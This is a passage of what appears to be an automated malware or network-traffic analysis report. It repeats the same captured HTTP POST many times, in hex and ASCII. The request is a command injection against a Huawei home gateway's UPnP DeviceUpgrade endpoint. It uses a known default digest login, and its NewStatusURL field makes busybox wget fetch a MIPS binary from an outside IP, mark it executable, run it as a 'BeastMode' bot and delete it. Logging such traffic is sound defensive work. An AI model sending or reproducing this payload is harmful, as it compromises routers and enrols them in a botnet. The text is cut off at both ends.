61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 